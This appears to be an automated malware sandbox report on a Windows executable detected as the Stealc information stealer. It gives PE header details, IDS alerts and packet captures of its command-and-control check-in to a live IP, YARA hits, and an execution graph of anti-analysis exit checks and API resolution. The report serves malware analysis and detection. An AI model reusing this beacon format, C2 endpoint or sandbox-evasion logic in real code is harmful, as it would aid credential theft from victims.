                Static PE Info

                General

                Entrypoint:0xa97000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F699880E83Ah

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x228007943013b848e93da4b34df6db7191893unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29b0000x200e5a29b04f6c072450b71528501588f8aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                bctajgqz0x4f90000x19d0000x19ca0001ce4d1addb5a847768d54ef091d1cb8False0.9949198632990003data7.953531786807203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                phttshfa0x6960000x10000x600376cb0d862309905cdd0e82c11f276d2False0.556640625data4.918785667922125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6970000x30000x22007d1c25521754e3871be1af956d8eb81aFalse0.06410845588235294DOS executable (COM)0.7215987148621581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-09-28T03:23:04.686587+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.949706185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 28, 2024 03:23:03.722526073 CEST4970680192.168.2.9185.215.113.37
                Sep 28, 2024 03:23:03.727597952 CEST8049706185.215.113.37192.168.2.9
                Sep 28, 2024 03:23:03.727861881 CEST4970680192.168.2.9185.215.113.37
                Sep 28, 2024 03:23:03.728097916 CEST4970680192.168.2.9185.215.113.37
                Sep 28, 2024 03:23:03.732861042 CEST8049706185.215.113.37192.168.2.9
                Sep 28, 2024 03:23:04.442666054 CEST8049706185.215.113.37192.168.2.9
                Sep 28, 2024 03:23:04.442723989 CEST4970680192.168.2.9185.215.113.37
                Sep 28, 2024 03:23:04.454196930 CEST4970680192.168.2.9185.215.113.37
                Sep 28, 2024 03:23:04.458985090 CEST8049706185.215.113.37192.168.2.9
                Sep 28, 2024 03:23:04.686531067 CEST8049706185.215.113.37192.168.2.9
                Sep 28, 2024 03:23:04.686587095 CEST4970680192.168.2.9185.215.113.37
                Sep 28, 2024 03:23:07.708157063 CEST4970680192.168.2.9185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.949706185.215.113.37807324C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:03.728097916 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Sep 28, 2024 03:23:04.442666054 CEST203INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:04 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Sep 28, 2024 03:23:04.454196930 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 42 31 36 36 33 42 38 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 48 44 47 48 43 47 48 44 48 4a 4b 46 42 46 42 4b 2d 2d 0d 0a
                Data Ascii: ------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="hwid"96B1663B80381806970752------JKEGHDGHCGHDHJKFBFBKContent-Disposition: form-data; name="build"save------JKEGHDGHCGHDHJKFBFBK--
                Sep 28, 2024 03:23:04.686531067 CEST210INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:04 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:1
                Start time:21:22:58
                Start date:27/09/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x920000
                File size:1'846'784 bytes
                MD5 hash:E904093EF887CB372B3FE7AB75E6C6C7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:8.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
                  execution_graph 13074 9369f0 13119 922260 13074->13119 13098 936a64 13099 93a9b0 4 API calls 13098->13099 13100 936a6b 13099->13100 13101 93a9b0 4 API calls 13100->13101 13102 936a72 13101->13102 13103 93a9b0 4 API calls 13102->13103 13104 936a79 13103->13104 13105 93a9b0 4 API calls 13104->13105 13106 936a80 13105->13106 13271 93a8a0 13106->13271 13108 936b0c 13275 936920 GetSystemTime 13108->13275 13110 936a89 13110->13108 13112 936ac2 OpenEventA 13110->13112 13114 936af5 CloseHandle Sleep 13112->13114 13115 936ad9 13112->13115 13116 936b0a 13114->13116 13118 936ae1 CreateEventA 13115->13118 13116->13110 13118->13108 13472 9245c0 13119->13472 13121 922274 13122 9245c0 2 API calls 13121->13122 13123 92228d 13122->13123 13124 9245c0 2 API calls 13123->13124 13125 9222a6 13124->13125 13126 9245c0 2 API calls 13125->13126 13127 9222bf 13126->13127 13128 9245c0 2 API calls 13127->13128 13129 9222d8 13128->13129 13130 9245c0 2 API calls 13129->13130 13131 9222f1 13130->13131 13132 9245c0 2 API calls 13131->13132 13133 92230a 13132->13133 13134 9245c0 2 API calls 13133->13134 13135 922323 13134->13135 13136 9245c0 2 API calls 13135->13136 13137 92233c 13136->13137 13138 9245c0 2 API calls 13137->13138 13139 922355 13138->13139 13140 9245c0 2 API calls 13139->13140 13141 92236e 13140->13141 13142 9245c0 2 API calls 13141->13142 13143 922387 13142->13143 13144 9245c0 2 API calls 13143->13144 13145 9223a0 13144->13145 13146 9245c0 2 API calls 13145->13146 13147 9223b9 13146->13147 13148 9245c0 2 API calls 13147->13148 13149 9223d2 13148->13149 13150 9245c0 2 API calls 13149->13150 13151 9223eb 13150->13151 13152 9245c0 2 API calls 13151->13152 13153 922404 13152->13153 13154 9245c0 2 API calls 13153->13154 13155 92241d 13154->13155 13156 9245c0 2 API calls 13155->13156 13157 922436 13156->13157 13158 9245c0 2 API calls 13157->13158 13159 92244f 13158->13159 13160 9245c0 2 API calls 13159->13160 13161 922468 13160->13161 13162 9245c0 2 API calls 13161->13162 13163 922481 13162->13163 13164 9245c0 2 API calls 13163->13164 13165 92249a 13164->13165 13166 9245c0 2 API calls 13165->13166 13167 9224b3 13166->13167 13168 9245c0 2 API calls 13167->13168 13169 9224cc 13168->13169 13170 9245c0 2 API calls 13169->13170 13171 9224e5 13170->13171 13172 9245c0 2 API calls 13171->13172 13173 9224fe 13172->13173 13174 9245c0 2 API calls 13173->13174 13175 922517 13174->13175 13176 9245c0 2 API calls 13175->13176 13177 922530 13176->13177 13178 9245c0 2 API calls 13177->13178 13179 922549 13178->13179 13180 9245c0 2 API calls 13179->13180 13181 922562 13180->13181 13182 9245c0 2 API calls 13181->13182 13183 92257b 13182->13183 13184 9245c0 2 API calls 13183->13184 13185 922594 13184->13185 13186 9245c0 2 API calls 13185->13186 13187 9225ad 13186->13187 13188 9245c0 2 API calls 13187->13188 13189 9225c6 13188->13189 13190 9245c0 2 API calls 13189->13190 13191 9225df 13190->13191 13192 9245c0 2 API calls 13191->13192 13193 9225f8 13192->13193 13194 9245c0 2 API calls 13193->13194 13195 922611 13194->13195 13196 9245c0 2 API calls 13195->13196 13197 92262a 13196->13197 13198 9245c0 2 API calls 13197->13198 13199 922643 13198->13199 13200 9245c0 2 API calls 13199->13200 13201 92265c 13200->13201 13202 9245c0 2 API calls 13201->13202 13203 922675 13202->13203 13204 9245c0 2 API calls 13203->13204 13205 92268e 13204->13205 13206 939860 13205->13206 13477 939750 GetPEB 13206->13477 13208 939868 13209 939a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13208->13209 13210 93987a 13208->13210 13211 939af4 GetProcAddress 13209->13211 13212 939b0d 13209->13212 13215 93988c 21 API calls 13210->13215 13211->13212 13213 939b46 13212->13213 13214 939b16 GetProcAddress GetProcAddress 13212->13214 13216 939b68 13213->13216 13217 939b4f GetProcAddress 13213->13217 13214->13213 13215->13209 13218 939b71 GetProcAddress 13216->13218 13219 939b89 13216->13219 13217->13216 13218->13219 13220 939b92 GetProcAddress GetProcAddress 13219->13220 13221 936a00 13219->13221 13220->13221 13222 93a740 13221->13222 13223 93a750 13222->13223 13224 936a0d 13223->13224 13225 93a77e lstrcpy 13223->13225 13226 9211d0 13224->13226 13225->13224 13227 9211e8 13226->13227 13228 921217 13227->13228 13229 92120f ExitProcess 13227->13229 13230 921160 GetSystemInfo 13228->13230 13231 921184 13230->13231 13232 92117c ExitProcess 13230->13232 13233 921110 GetCurrentProcess VirtualAllocExNuma 13231->13233 13234 921141 ExitProcess 13233->13234 13235 921149 13233->13235 13478 9210a0 VirtualAlloc 13235->13478 13238 921220 13482 9389b0 13238->13482 13241 92129a 13244 936770 GetUserDefaultLangID 13241->13244 13242 921292 ExitProcess 13243 921249 __aulldiv 13243->13241 13243->13242 13245 9367d3 13244->13245 13246 936792 13244->13246 13252 921190 13245->13252 13246->13245 13247 9367a3 ExitProcess 13246->13247 13248 9367c1 ExitProcess 13246->13248 13249 9367b7 ExitProcess 13246->13249 13250 9367cb ExitProcess 13246->13250 13251 9367ad ExitProcess 13246->13251 13250->13245 13253 9378e0 3 API calls 13252->13253 13254 92119e 13253->13254 13255 9211cc 13254->13255 13256 937850 3 API calls 13254->13256 13259 937850 GetProcessHeap RtlAllocateHeap GetUserNameA 13255->13259 13257 9211b7 13256->13257 13257->13255 13258 9211c4 ExitProcess 13257->13258 13260 936a30 13259->13260 13261 9378e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13260->13261 13262 936a43 13261->13262 13263 93a9b0 13262->13263 13484 93a710 13263->13484 13265 93a9c1 lstrlen 13266 93a9e0 13265->13266 13267 93aa18 13266->13267 13269 93a9fa lstrcpy lstrcat 13266->13269 13485 93a7a0 13267->13485 13269->13267 13270 93aa24 13270->13098 13272 93a8bb 13271->13272 13273 93a90b 13272->13273 13274 93a8f9 lstrcpy 13272->13274 13273->13110 13274->13273 13489 936820 13275->13489 13277 93698e 13278 936998 sscanf 13277->13278 13518 93a800 13278->13518 13280 9369aa SystemTimeToFileTime SystemTimeToFileTime 13281 9369e0 13280->13281 13282 9369ce 13280->13282 13284 935b10 13281->13284 13282->13281 13283 9369d8 ExitProcess 13282->13283 13285 935b1d 13284->13285 13286 93a740 lstrcpy 13285->13286 13287 935b2e 13286->13287 13520 93a820 lstrlen 13287->13520 13290 93a820 2 API calls 13291 935b64 13290->13291 13292 93a820 2 API calls 13291->13292 13293 935b74 13292->13293 13524 936430 13293->13524 13296 93a820 2 API calls 13297 935b93 13296->13297 13298 93a820 2 API calls 13297->13298 13299 935ba0 13298->13299 13300 93a820 2 API calls 13299->13300 13301 935bad 13300->13301 13302 93a820 2 API calls 13301->13302 13303 935bf9 13302->13303 13533 9226a0 13303->13533 13311 935cc3 13312 936430 lstrcpy 13311->13312 13313 935cd5 13312->13313 13314 93a7a0 lstrcpy 13313->13314 13315 935cf2 13314->13315 13316 93a9b0 4 API calls 13315->13316 13317 935d0a 13316->13317 13318 93a8a0 lstrcpy 13317->13318 13319 935d16 13318->13319 13320 93a9b0 4 API calls 13319->13320 13321 935d3a 13320->13321 13322 93a8a0 lstrcpy 13321->13322 13323 935d46 13322->13323 13324 93a9b0 4 API calls 13323->13324 13325 935d6a 13324->13325 13326 93a8a0 lstrcpy 13325->13326 13327 935d76 13326->13327 13328 93a740 lstrcpy 13327->13328 13329 935d9e 13328->13329 14259 937500 GetWindowsDirectoryA 13329->14259 13332 93a7a0 lstrcpy 13333 935db8 13332->13333 14269 924880 13333->14269 13335 935dbe 14414 9317a0 13335->14414 13337 935dc6 13338 93a740 lstrcpy 13337->13338 13339 935de9 13338->13339 13340 921590 lstrcpy 13339->13340 13341 935dfd 13340->13341 14430 925960 13341->14430 13343 935e03 14574 931050 13343->14574 13345 935e0e 13346 93a740 lstrcpy 13345->13346 13347 935e32 13346->13347 13348 921590 lstrcpy 13347->13348 13349 935e46 13348->13349 13350 925960 34 API calls 13349->13350 13351 935e4c 13350->13351 14578 930d90 13351->14578 13353 935e57 13354 93a740 lstrcpy 13353->13354 13355 935e79 13354->13355 13356 921590 lstrcpy 13355->13356 13357 935e8d 13356->13357 13358 925960 34 API calls 13357->13358 13359 935e93 13358->13359 14585 930f40 13359->14585 13361 935e9e 13362 921590 lstrcpy 13361->13362 13363 935eb5 13362->13363 14590 931a10 13363->14590 13365 935eba 13366 93a740 lstrcpy 13365->13366 13367 935ed6 13366->13367 14934 924fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13367->14934 13369 935edb 13370 921590 lstrcpy 13369->13370 13371 935f5b 13370->13371 14941 930740 13371->14941 13373 935f60 13374 93a740 lstrcpy 13373->13374 13375 935f86 13374->13375 13376 921590 lstrcpy 13375->13376 13377 935f9a 13376->13377 13378 925960 34 API calls 13377->13378 13379 935fa0 13378->13379 13473 9245d1 RtlAllocateHeap 13472->13473 13475 924621 VirtualProtect 13473->13475 13475->13121 13477->13208 13480 9210c2 codecvt 13478->13480 13479 9210fd 13479->13238 13480->13479 13481 9210e2 VirtualFree 13480->13481 13481->13479 13483 921233 GlobalMemoryStatusEx 13482->13483 13483->13243 13484->13265 13486 93a7c2 13485->13486 13487 93a7ec 13486->13487 13488 93a7da lstrcpy 13486->13488 13487->13270 13488->13487 13490 93a740 lstrcpy 13489->13490 13491 936833 13490->13491 13492 93a9b0 4 API calls 13491->13492 13493 936845 13492->13493 13494 93a8a0 lstrcpy 13493->13494 13495 93684e 13494->13495 13496 93a9b0 4 API calls 13495->13496 13497 936867 13496->13497 13498 93a8a0 lstrcpy 13497->13498 13499 936870 13498->13499 13500 93a9b0 4 API calls 13499->13500 13501 93688a 13500->13501 13502 93a8a0 lstrcpy 13501->13502 13503 936893 13502->13503 13504 93a9b0 4 API calls 13503->13504 13505 9368ac 13504->13505 13506 93a8a0 lstrcpy 13505->13506 13507 9368b5 13506->13507 13508 93a9b0 4 API calls 13507->13508 13509 9368cf 13508->13509 13510 93a8a0 lstrcpy 13509->13510 13511 9368d8 13510->13511 13512 93a9b0 4 API calls 13511->13512 13513 9368f3 13512->13513 13514 93a8a0 lstrcpy 13513->13514 13515 9368fc 13514->13515 13516 93a7a0 lstrcpy 13515->13516 13517 936910 13516->13517 13517->13277 13519 93a812 13518->13519 13519->13280 13521 93a83f 13520->13521 13522 935b54 13521->13522 13523 93a87b lstrcpy 13521->13523 13522->13290 13523->13522 13525 93a8a0 lstrcpy 13524->13525 13526 936443 13525->13526 13527 93a8a0 lstrcpy 13526->13527 13528 936455 13527->13528 13529 93a8a0 lstrcpy 13528->13529 13530 936467 13529->13530 13531 93a8a0 lstrcpy 13530->13531 13532 935b86 13531->13532 13532->13296 13534 9245c0 2 API calls 13533->13534 13535 9226b4 13534->13535 13536 9245c0 2 API calls 13535->13536 13537 9226d7 13536->13537 13538 9245c0 2 API calls 13537->13538 13539 9226f0 13538->13539 13540 9245c0 2 API calls 13539->13540 13541 922709 13540->13541 13542 9245c0 2 API calls 13541->13542 13543 922736 13542->13543 13544 9245c0 2 API calls 13543->13544 13545 92274f 13544->13545 13546 9245c0 2 API calls 13545->13546 13547 922768 13546->13547 13548 9245c0 2 API calls 13547->13548 13549 922795 13548->13549 13550 9245c0 2 API calls 13549->13550 13551 9227ae 13550->13551 13552 9245c0 2 API calls 13551->13552 13553 9227c7 13552->13553 13554 9245c0 2 API calls 13553->13554 13555 9227e0 13554->13555 13556 9245c0 2 API calls 13555->13556 13557 9227f9 13556->13557 13558 9245c0 2 API calls 13557->13558 13559 922812 13558->13559 13560 9245c0 2 API calls 13559->13560 13561 92282b 13560->13561 13562 9245c0 2 API calls 13561->13562 13563 922844 13562->13563 13564 9245c0 2 API calls 13563->13564 13565 92285d 13564->13565 13566 9245c0 2 API calls 13565->13566 13567 922876 13566->13567 13568 9245c0 2 API calls 13567->13568 13569 92288f 13568->13569 13570 9245c0 2 API calls 13569->13570 13571 9228a8 13570->13571 13572 9245c0 2 API calls 13571->13572 13573 9228c1 13572->13573 13574 9245c0 2 API calls 13573->13574 13575 9228da 13574->13575 13576 9245c0 2 API calls 13575->13576 13577 9228f3 13576->13577 13578 9245c0 2 API calls 13577->13578 13579 92290c 13578->13579 13580 9245c0 2 API calls 13579->13580 13581 922925 13580->13581 13582 9245c0 2 API calls 13581->13582 13583 92293e 13582->13583 13584 9245c0 2 API calls 13583->13584 13585 922957 13584->13585 13586 9245c0 2 API calls 13585->13586 13587 922970 13586->13587 13588 9245c0 2 API calls 13587->13588 13589 922989 13588->13589 13590 9245c0 2 API calls 13589->13590 13591 9229a2 13590->13591 13592 9245c0 2 API calls 13591->13592 13593 9229bb 13592->13593 13594 9245c0 2 API calls 13593->13594 13595 9229d4 13594->13595 13596 9245c0 2 API calls 13595->13596 13597 9229ed 13596->13597 13598 9245c0 2 API calls 13597->13598 13599 922a06 13598->13599 13600 9245c0 2 API calls 13599->13600 13601 922a1f 13600->13601 13602 9245c0 2 API calls 13601->13602 13603 922a38 13602->13603 13604 9245c0 2 API calls 13603->13604 13605 922a51 13604->13605 13606 9245c0 2 API calls 13605->13606 13607 922a6a 13606->13607 13608 9245c0 2 API calls 13607->13608 13609 922a83 13608->13609 13610 9245c0 2 API calls 13609->13610 13611 922a9c 13610->13611 13612 9245c0 2 API calls 13611->13612 13613 922ab5 13612->13613 13614 9245c0 2 API calls 13613->13614 13615 922ace 13614->13615 13616 9245c0 2 API calls 13615->13616 13617 922ae7 13616->13617 13618 9245c0 2 API calls 13617->13618 13619 922b00 13618->13619 13620 9245c0 2 API calls 13619->13620 13621 922b19 13620->13621 13622 9245c0 2 API calls 13621->13622 13623 922b32 13622->13623 13624 9245c0 2 API calls 13623->13624 13625 922b4b 13624->13625 13626 9245c0 2 API calls 13625->13626 13627 922b64 13626->13627 13628 9245c0 2 API calls 13627->13628 13629 922b7d 13628->13629 13630 9245c0 2 API calls 13629->13630 13631 922b96 13630->13631 13632 9245c0 2 API calls 13631->13632 13633 922baf 13632->13633 13634 9245c0 2 API calls 13633->13634 13635 922bc8 13634->13635 13636 9245c0 2 API calls 13635->13636 13637 922be1 13636->13637 13638 9245c0 2 API calls 13637->13638 13639 922bfa 13638->13639 13640 9245c0 2 API calls 13639->13640 13641 922c13 13640->13641 13642 9245c0 2 API calls 13641->13642 13643 922c2c 13642->13643 13644 9245c0 2 API calls 13643->13644 13645 922c45 13644->13645 13646 9245c0 2 API calls 13645->13646 13647 922c5e 13646->13647 13648 9245c0 2 API calls 13647->13648 13649 922c77 13648->13649 13650 9245c0 2 API calls 13649->13650 13651 922c90 13650->13651 13652 9245c0 2 API calls 13651->13652 13653 922ca9 13652->13653 13654 9245c0 2 API calls 13653->13654 13655 922cc2 13654->13655 13656 9245c0 2 API calls 13655->13656 13657 922cdb 13656->13657 13658 9245c0 2 API calls 13657->13658 13659 922cf4 13658->13659 13660 9245c0 2 API calls 13659->13660 13661 922d0d 13660->13661 13662 9245c0 2 API calls 13661->13662 13663 922d26 13662->13663 13664 9245c0 2 API calls 13663->13664 13665 922d3f 13664->13665 13666 9245c0 2 API calls 13665->13666 13667 922d58 13666->13667 13668 9245c0 2 API calls 13667->13668 13669 922d71 13668->13669 13670 9245c0 2 API calls 13669->13670 13671 922d8a 13670->13671 13672 9245c0 2 API calls 13671->13672 13673 922da3 13672->13673 13674 9245c0 2 API calls 13673->13674 13675 922dbc 13674->13675 13676 9245c0 2 API calls 13675->13676 13677 922dd5 13676->13677 13678 9245c0 2 API calls 13677->13678 13679 922dee 13678->13679 13680 9245c0 2 API calls 13679->13680 13681 922e07 13680->13681 13682 9245c0 2 API calls 13681->13682 13683 922e20 13682->13683 13684 9245c0 2 API calls 13683->13684 13685 922e39 13684->13685 13686 9245c0 2 API calls 13685->13686 13687 922e52 13686->13687 13688 9245c0 2 API calls 13687->13688 13689 922e6b 13688->13689 13690 9245c0 2 API calls 13689->13690 13691 922e84 13690->13691 13692 9245c0 2 API calls 13691->13692 13693 922e9d 13692->13693 13694 9245c0 2 API calls 13693->13694 13695 922eb6 13694->13695 13696 9245c0 2 API calls 13695->13696 13697 922ecf 13696->13697 13698 9245c0 2 API calls 13697->13698 13699 922ee8 13698->13699 13700 9245c0 2 API calls 13699->13700 13701 922f01 13700->13701 13702 9245c0 2 API calls 13701->13702 13703 922f1a 13702->13703 13704 9245c0 2 API calls 13703->13704 13705 922f33 13704->13705 13706 9245c0 2 API calls 13705->13706 13707 922f4c 13706->13707 13708 9245c0 2 API calls 13707->13708 13709 922f65 13708->13709 13710 9245c0 2 API calls 13709->13710 13711 922f7e 13710->13711 13712 9245c0 2 API calls 13711->13712 13713 922f97 13712->13713 13714 9245c0 2 API calls 13713->13714 13715 922fb0 13714->13715 13716 9245c0 2 API calls 13715->13716 13717 922fc9 13716->13717 13718 9245c0 2 API calls 13717->13718 13719 922fe2 13718->13719 13720 9245c0 2 API calls 13719->13720 13721 922ffb 13720->13721 13722 9245c0 2 API calls 13721->13722 13723 923014 13722->13723 13724 9245c0 2 API calls 13723->13724 13725 92302d 13724->13725 13726 9245c0 2 API calls 13725->13726 13727 923046 13726->13727 13728 9245c0 2 API calls 13727->13728 13729 92305f 13728->13729 13730 9245c0 2 API calls 13729->13730 13731 923078 13730->13731 13732 9245c0 2 API calls 13731->13732 13733 923091 13732->13733 13734 9245c0 2 API calls 13733->13734 13735 9230aa 13734->13735 13736 9245c0 2 API calls 13735->13736 13737 9230c3 13736->13737 13738 9245c0 2 API calls 13737->13738 13739 9230dc 13738->13739 13740 9245c0 2 API calls 13739->13740 13741 9230f5 13740->13741 13742 9245c0 2 API calls 13741->13742 13743 92310e 13742->13743 13744 9245c0 2 API calls 13743->13744 13745 923127 13744->13745 13746 9245c0 2 API calls 13745->13746 13747 923140 13746->13747 13748 9245c0 2 API calls 13747->13748 13749 923159 13748->13749 13750 9245c0 2 API calls 13749->13750 13751 923172 13750->13751 13752 9245c0 2 API calls 13751->13752 13753 92318b 13752->13753 13754 9245c0 2 API calls 13753->13754 13755 9231a4 13754->13755 13756 9245c0 2 API calls 13755->13756 13757 9231bd 13756->13757 13758 9245c0 2 API calls 13757->13758 13759 9231d6 13758->13759 13760 9245c0 2 API calls 13759->13760 13761 9231ef 13760->13761 13762 9245c0 2 API calls 13761->13762 13763 923208 13762->13763 13764 9245c0 2 API calls 13763->13764 13765 923221 13764->13765 13766 9245c0 2 API calls 13765->13766 13767 92323a 13766->13767 13768 9245c0 2 API calls 13767->13768 13769 923253 13768->13769 13770 9245c0 2 API calls 13769->13770 13771 92326c 13770->13771 13772 9245c0 2 API calls 13771->13772 13773 923285 13772->13773 13774 9245c0 2 API calls 13773->13774 13775 92329e 13774->13775 13776 9245c0 2 API calls 13775->13776 13777 9232b7 13776->13777 13778 9245c0 2 API calls 13777->13778 13779 9232d0 13778->13779 13780 9245c0 2 API calls 13779->13780 13781 9232e9 13780->13781 13782 9245c0 2 API calls 13781->13782 13783 923302 13782->13783 13784 9245c0 2 API calls 13783->13784 13785 92331b 13784->13785 13786 9245c0 2 API calls 13785->13786 13787 923334 13786->13787 13788 9245c0 2 API calls 13787->13788 13789 92334d 13788->13789 13790 9245c0 2 API calls 13789->13790 13791 923366 13790->13791 13792 9245c0 2 API calls 13791->13792 13793 92337f 13792->13793 13794 9245c0 2 API calls 13793->13794 13795 923398 13794->13795 13796 9245c0 2 API calls 13795->13796 13797 9233b1 13796->13797 13798 9245c0 2 API calls 13797->13798 13799 9233ca 13798->13799 13800 9245c0 2 API calls 13799->13800 13801 9233e3 13800->13801 13802 9245c0 2 API calls 13801->13802 13803 9233fc 13802->13803 13804 9245c0 2 API calls 13803->13804 13805 923415 13804->13805 13806 9245c0 2 API calls 13805->13806 13807 92342e 13806->13807 13808 9245c0 2 API calls 13807->13808 13809 923447 13808->13809 13810 9245c0 2 API calls 13809->13810 13811 923460 13810->13811 13812 9245c0 2 API calls 13811->13812 13813 923479 13812->13813 13814 9245c0 2 API calls 13813->13814 13815 923492 13814->13815 13816 9245c0 2 API calls 13815->13816 13817 9234ab 13816->13817 13818 9245c0 2 API calls 13817->13818 13819 9234c4 13818->13819 13820 9245c0 2 API calls 13819->13820 13821 9234dd 13820->13821 13822 9245c0 2 API calls 13821->13822 13823 9234f6 13822->13823 13824 9245c0 2 API calls 13823->13824 13825 92350f 13824->13825 13826 9245c0 2 API calls 13825->13826 13827 923528 13826->13827 13828 9245c0 2 API calls 13827->13828 13829 923541 